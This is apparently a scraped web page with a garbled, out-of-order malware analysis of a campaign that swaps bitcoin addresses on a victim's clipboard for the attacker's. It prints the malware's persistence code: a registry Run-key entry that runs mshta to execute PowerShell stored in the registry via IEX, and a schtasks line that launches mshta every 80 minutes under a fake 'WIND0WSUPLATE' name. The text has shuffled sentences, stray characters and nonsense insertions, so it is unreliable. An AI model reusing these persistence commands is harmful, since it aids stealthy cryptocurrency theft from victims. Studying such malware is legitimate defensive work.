![]() ![]() If it’s a valid bitcoin address, it replaces the bitcoin address with attacker’s. It does this by continually detecting the data on the system clipboard. #Coccoc download continuation codeGoing through the PowerShell code we can see it performs a bitcoin address hijack. MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:\Software).nasdnasndnad)|IEX"""", 0 : window.close"")", EXCELX To do so, it executes the following code. It also adds an item to execute this PowerShell code into the Auto-Run group in the system registry, causing it to run at system startup (refer to the item “replcia” in Figure 3.2). Executing it saves a batch of PowerShell code into the system registry under the subkey "HKCU\Software\nasdnasndnad". Hijacking a Bitcoin address on the victim’s deviceĪfter being decoded, we then obtained the second piece of VBScript code. n "schtasks /create /sc MINUTE /mo 80 /tn \"WIND0WSUPLATE\" /F /tr \"MsHtA\" 27.html\"" ,0Ģ. Its action is to execute command “mshta and it’s called every 80 minutes. It creates a WMI (Windows Management Instrumentation) Object to add into the Auto-Run group by calling its function “SetStringValue()”.īesides adding items into the Auto-Run group, it adds a scheduled task in “Task Scheduler” to make the entire campaign work effectively.īelow is the code used to run “schtasks” to create a new scheduled task.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |